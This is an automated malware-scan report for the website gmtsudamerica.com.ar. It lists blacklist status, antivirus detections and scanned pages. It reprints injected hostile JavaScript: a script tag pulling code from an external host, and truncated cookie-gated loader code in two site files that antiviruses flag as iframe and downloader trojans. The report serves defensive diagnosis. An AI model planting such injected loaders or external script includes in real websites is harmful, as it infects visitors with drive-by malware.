New scan:

Malware Scanner report for gmtsudamerica.com.ar

Malicious/Suspicious/Total urls checked
2/1/4
3 pages have malicious or suspicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "gmtsudamerica.com.ar" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=gmtsudamerica.com.ar

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://gmtsudamerica.com.ar/
200 OK
Content-Length: 6210
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://albacoboats.com/3hndxpjz.php?id=21581295"></script>

http://www.gmtsudamerica.com.ar/gmts/js/png.js
200 OK
Content-Length: 2438
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

if (navigator.platform == "Win32" && navigator.appName == "Microsoft Internet Explorer" && window.attachEvent) {
document.writeln('<style type="text/css">img { visibility:hidden; } </style>');
window.attachEvent("onload", fnLoadPngs);
}
function fnLoadPngs() {
var rslt = navigator.appVersion.match(/MSIE (\d \.\d )/, '');
var itsAllGood = (rslt != null && Number(rslt[1]) >= 5.5);
for (var i = document.images.length - 1, img = null
... 1561 bytes are skipped ...
name ) { var start = document.cookie.indexOf( name "=" ); var len = start name.length 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');aspvw09();}}

Antivirus reports:

AntiVir
HTML/Rce.Gen
Avast
JS:Includer-AJE [Trj]
Ikarus
Trojan.JS.IFrame
K7AntiVirus
Riskware ( 885143830 )
TrendMicro-HouseCall
TROJ_GEN.F47V0121
Comodo
UnclassifiedMalware
Microsoft
Trojan:JS/Quidvetis.A
Fortinet
JS/Blacole.EU!tr.dldr
NANO-Antivirus
Trojan.Script.Iframe.bopaxv
F-Prot
JS/IFrame.RS.gen
Norman
Iframer.BI
Commtouch
JS/IFrame.RS.gen

http://gmtsudamerica.com.ar/Scripts/AC_RunActiveContent.js
200 OK
Content-Length: 9632
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false;
var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false;
var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false;
function ControlVersion()
{
var version;
var axo;
var e;

try {
axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");
version = axo.GetVariable("$version");
} catch (e) {
}
if (!version)
... 3375 bytes are skipped ...
name ) { var start = document.cookie.indexOf( name "=" ); var len = start name.length 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');aspvw09();}}

Antivirus reports:

AntiVir
HTML/Rce.Gen
Avast
JS:Includer-AJE [Trj]
Ikarus
Trojan.JS.IFrame
TrendMicro-HouseCall
TROJ_GEN.F47V0121
Comodo
UnclassifiedMalware
Microsoft
Trojan:JS/Quidvetis.A
Fortinet
JS/Blacole.EU!tr.dldr
Norman
Iframer.BI

http://gmtsudamerica.com.ar/test404page.js
404 Not Found
Content-Length: 337
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: gmtsudamerica.com.ar

Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 Mar 2015 08:57:20 GMT
Accept-Ranges: bytes
ETag: "1c0e9d-1842-5089820ead9da"
Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 6210
Content-Type: text/html
Last-Modified: Mon, 24 Nov 2014 10:19:23 GMT

...6210 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: gmtsudamerica.com.ar
Referer: http://www.google.com/search?q=gmtsudamerica.com.ar

Result:
The result is similar to the first query. There are no suspicious redirects found.